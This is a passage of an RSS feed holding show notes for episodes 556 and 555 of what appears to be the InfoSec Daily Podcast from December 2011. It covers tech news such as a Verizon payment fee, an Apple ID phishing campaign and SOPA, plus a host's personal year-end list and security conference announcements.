	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As part of the lawsuit, the plaintiffs have been seeking to make public both the letter that accuses Hurd of harassment as well as a report documenting the result of an internal investigation conducted by HP&#39;s board of directors. Plaintiffs had argued that the letter and report offered shareholders insight into possible corporate wrongdoing and waste that may have arisen due to the harassment case that led to Hurd&#39;s resignation. Investors involved in the suit also want the terms of Hurd&#39;s severance package from HP made public.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-30686_3-57349742-266/verizon-wireless-yep-thatll-be-$2-to-pay-your-bill-online"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30686_3-57349742-266/verizon-wireless-yep-thatll-be-$2-to-pay-your-bill-online</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In what has to be the asshat move of the month, it seems that Verizon Wireless has decided that they want to charge customers $2 to pay their bills online. &nbsp;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A leaked memo from the company first </span><a href="http://www.engadget.com/2011/12/29/leaked-memo-details-verizons-2-fee-for-paying-your-bill-autod/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">reported by Engadget</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, showed some of the details of the new plan. And the </span><a href="http://www.phonescoop.com/articles/article.php?a=9549"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog Phone Scoop got confirmation from a Verizon representative</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Thursday of the change.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The new fee will go into effect starting January 15 and doesn&#39;t apply to customers paying their bills with an electronic check or who enroll in autopay using a credit, debit, or AT&amp;T cards, according to the memo posted on Endgadget. Customers using Verizon Wireless gift cards or Verizon Wireless device rebate cards and customers using standard paper check and money orders made payable directly to Verizon Wireless will also not be charged a fee, Phone Scoop reported.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Verizon said that customers making single payments online will be notified of the fee before they complete their transactions.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The fee associated with paying your bill online is part of a larger trend by companies to extract more money from customers to access certain forms of payment. Bank of America was criticized earlier this year for its plans to charge customers a $5 fee to use debit cards.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Verizon&#39;s plan seems to make little sense, given that the company offers several ways to avoid the fee. Verizon didn&#39;t elaborate on why it&#39;s charging this fee. My guess is that the company that clears these payments is charging Verizon a fee that Verizon is passing on to customers. Still, it seems ridiculous that paying a bill online or by phone could cost Verizon more than processing a hand-written check or money order that is sent to the company through the regular mail.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.whnt.com/news/whnt-phishing-scam-targets-new-owners-of-apple-products-20111229,0,4765566.story"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.whnt.com/news/whnt-phishing-scam-targets-new-owners-of-apple-products-20111229,0,4765566.story</span></a><br />
	<a href="http://www.whnt.com/news/whnt-phishing-scam-targets-new-owners-of-apple-products-20111229,0,4765566.story"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you own an AppleID account, be sure to look out for a well-crafted phishing scam that&#39;s been going o</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ver the past week. &nbsp;The email has targeted Apple users, fooling them into give their Apple IDs and billing information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Internet security firm </span><a href="http://blog.intego.com/beware-of-apple-billing-information-phishing-e-mails/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Intego</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> says the email was sent to many owners of iPhone, iPod and iMac with the &quot;Apple update your Billing Information&quot; in the subject line.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is how the phishing scam works:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After the Apple users open the email, they will find a message claiming to have originated from &quot;appleid@id.apple.com.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The email will tell the users that their current billing records are &quot;out of date,&quot; and it will provide a link to the Apple Store, urging the users to click on that link and confirm their billing records. However, if the users click the link, they will be directed to a fake Apple sign-in page. Users who received the email, said the fake sign-in page is nearly identical to the real sign-in page.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the users enter their Apple ID and password, they will be reminded to update their billing account information, especially their credit card information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Geordy&rsquo;s Top &ldquo;6&rdquo; Moments of 2011:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Top &ldquo;anything&rdquo; lists are notoriously hard to make, especially when you&rsquo;re trying to sort through a year&#39;s worth of memories and can barely remember last week. &nbsp;So without further ado, here is my best of 2011 &#8211; my top seven personal moments of the year because I couldn&rsquo;t keep it to five.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sownage 2011</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; This single breach was arguably one of the largest and most poorly handled security incidents of all time and it propelled infosec in front of a lot of fresh faces. &nbsp;This incident personally opened my eyes to what kind of company Sony is and resulted in countless piles of bullshit metrics and excuses. &nbsp;This event makes me question the viability of a Playstation 4 platform.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Toorcon Seattle</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Since I did not get to go to Derbycon, I have to give mad props to h1kari and the rest of the crew who put on Toorcon. &nbsp;They took a different approach from any other con. &nbsp;Instead of turning away speakers, adding tracks or days, they simple used time compression. &nbsp;In roughly 8 hours, I saw nearly 30 talks. &nbsp;It was an amazing firehose of knowledge and free beer. &nbsp;I hope they do it the same next time(2013) since it was a raging success in my opinion.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Brian Alseth Interview</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; If I had to pick a show from this year that I value the most, I would say it was the Brian Alseth interview which is episode 434. &nbsp;To remind the audience, Brian Alseth is an attorney with the Washington State branch of the ACLU. &nbsp;His job has been partially to make the tech community aware of the great things they are doing for our community. &nbsp;Brian is awesome because he doesn&rsquo;t give you a legalese bullshit answer like a typical attorney. &nbsp;He will say exactly what is on his mind. &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Schuyler Towne visiting BLR</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Schuyler as everyone knows has been involved in a bit of a debacle over his kickstarter project. &nbsp;While he&rsquo;s been working on that, he&rsquo;s also been on a tour of hackspaces and companies to teach people about lock history, lock picking and anything else you could possibly want to know related to locks. &nbsp;Schulyer came out to my hackerspace, Black Lodge Research in Redmond, WA a few months back and gave us a whole day of his time. &nbsp;I have to say he has more curiosity and knowledge of physical locking mechanisms of anyone I&rsquo;ve ever met but I would also add that he is one of the most generous and transparent people I&rsquo;ve ever met either. &nbsp;Anyone who has met him and talked to him for 15 minutes would probably say the same thing.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Chris Hoff</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; finding my wallet in a random Las Vegas bar. &nbsp;I wasn&rsquo;t even drunk that night but my wallet slipped out of my pocket and I didn&rsquo;t notice. &nbsp;When I woke up I freaked out since I drove all the way to Vegas and really didn&rsquo;t want to drive the 1400 miles home without my ID. &nbsp;Hoff spotted the wallet and turned to twitter to see if anyone knew who the hell I was. &nbsp;Thankfully the community is not all that large and people who follow both of us were able to get us in touch. &nbsp;That event certainly speaks highly of our community of hackers and miscreants. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">New Job</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Getting hired on as a security consultant has been awesome and I&rsquo;d like to thank everyone who made that possible.(they know who they are) &nbsp;I was in tech once upon a time but in a different capacity around the turn of the millennium. &nbsp;In hindsight, I probably should have stuck with it but I had NO IDEA about the community that existed and didn&rsquo;t really know how to plug into it. &nbsp;Being in the community is truly brain augmentation. &nbsp;If I don&rsquo;t know something, I know hundreds of people to ask and they are always happy to help.</span><br />
	<span id="internal-source-marker_0.27175888425579486" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">0) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Bonus</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Karthik and his girlfriend coming up to Seattle for a visit on my recommendation. &nbsp;That was a fun weekend and I&rsquo;ve never eaten so much good food in such a short timespan. &nbsp;&nbsp;His girlfriend could have done a better job of maintaining control over her stomach contents though and Boris wasn&rsquo;t the first ISD member to fall asleep on a show but at least Karthik wasn&rsquo;t snoring.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wish you and your families a Very Happy New Year</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We would like to thank all of our listeners, friends and families for the encouragement and support. &nbsp;&nbsp;We never expected to have such a large listenership when there are so many choices on the Internet, it certainly feels like we&rsquo;re just one of the 80 million or so other security podcasts. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Until Next Year. &nbsp;Be Safe!</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-556-nuclear-option-lapd-hurd-asshat-move-apple-phishing-geordys-top-6/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3316/0/infosec-daily-podcast-episode-556.mp3" length="22493663" type="audio/mpeg" />
		<itunes:duration>0:46:49</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 556 for December 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka t[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 556 for December 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.dailykos.com/story/2011/12/29/1049815/-Internet-giants-seriously-considering-nuclear-option-to-stop-SOPA
	When the home pages of Google.com, Amazon.com, Facebook.com, and their Internet allies simultaneously turn black with anti-censorship warnings that ask users to contact politicians about a vote in the U.S. Congress the next day on SOPA, you&#39;ll know they&#39;re finally serious.
	True, it would be the political equivalent of a nuclear option&#8211;possibly drawing retributions from the the influential politicos backing SOPA and Protect IP&#8211;but one that could nevertheless be launched in 2012.
	&#34;There have been some serious discussions about that,&#34; says Markham Erickson, who heads the NetCoalition trade association that counts Google, Amazon.com, eBay, and Yahoo as members. &#34;It has never happened before.&#34;
	&#8230;
	Source: &#160;http://www.computerworld.com/s/article/9222932/Plans_to_migrate_LAPD_to_Google_s_cloud_apps_dropped
	Bad news [if you&#8217;re a cloud aficionado&#8230;], apparently Google Inc.&#8217;s cloud resident email and applications products have been rejected by a single component of the City of Los Angeles, namely the Los Angeles Police Department. Evidently, the products do not meet United States Department of Justice and Federal Bureau of Investigation security guidelines for law enforcement agencies (in this case CJIS). We do applaud the LAPD for it&#8217;s decision to protect and defend it&#8217;s confidential information.
	&#8230;.
	Source: &#160;http://news.cnet.com/8301-30686_3-57349688-266/former-hp-ceo-mark-hurd-loses-appeal-to-keep-letter-sealed
	Mark Hurd, Hewlett-Packard&#39;s former CEO and now the current president of Oracle, lost his fight in court this week to keep confidential a letter alleging sexual harassment.
	A Delaware court ruled yesterday that Hurd had not established &#34;good cause[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 555 &#8211; Subpoena Leak, Don’t Fear The Reaver, Stuxnet Cousins, Trion, MS11-100 &amp; Karthik’s Top 5</title>
		<link>http://www.isdpodcast.com/episode-555-subpoena-leak-dont-fear-the-reaver-stuxnet-cousins-trion-ms11-100-karthiks-top-5</link>
		<comments>http://www.isdpodcast.com/episode-555-subpoena-leak-dont-fear-the-reaver-stuxnet-cousins-trion-ms11-100-karthiks-top-5#comments</comments>
		<pubDate>Fri, 30 Dec 2011 01:56:01 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3313</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 555 for December 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 555 for December 29, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
